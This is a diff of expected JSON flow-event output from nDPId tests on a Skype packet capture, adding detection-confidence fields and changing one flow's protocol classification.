+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969699577,"flow_last_seen":1431969718631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50092,"dst_port":40020,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969699577,"flow_last_seen":1431969718631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50092,"dst_port":40020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00615{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969704664,"flow_last_seen":1431969722362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":241,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50097,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969704664,"flow_last_seen":1431969722362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":241,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50097,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969704664,"flow_last_seen":1431969722362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":241,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50097,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969788719,"flow_last_seen":1431969803191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"78.202.226.115","src_port":50143,"dst_port":29059,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969788719,"flow_last_seen":1431969803191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"78.202.226.115","src_port":50143,"dst_port":29059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -1312,85 +1311,85 @@
 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969789832,"flow_last_seen":1431969808350,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"78.202.226.115","src_port":50144,"dst_port":29059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969689470,"flow_last_seen":1431969716588,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":11,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50075,"dst_port":40003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969689470,"flow_last_seen":1431969716588,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":11,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50075,"dst_port":40003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.21","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.26","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.47","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.37","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969698743,"flow_last_seen":1431969698797,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.21","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.26","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.47","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.37","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969698743,"flow_last_seen":1431969698797,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969675950,"flow_last_seen":1431969702405,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55159,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642247,"flow_last_seen":1431969668794,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65426,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00659{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":472,"flow_first_seen":1431969710853,"flow_last_seen":1431969807279,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":133455,"flow_avg_l4_payload_len":282,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":50108,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":49485,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00614{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431969712918,"flow_last_seen":1431969747557,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":384,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00634{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":472,"flow_first_seen":1431969710853,"flow_last_seen":1431969807279,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":133455,"flow_avg_l4_payload_len":282,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":50108,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":49485,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
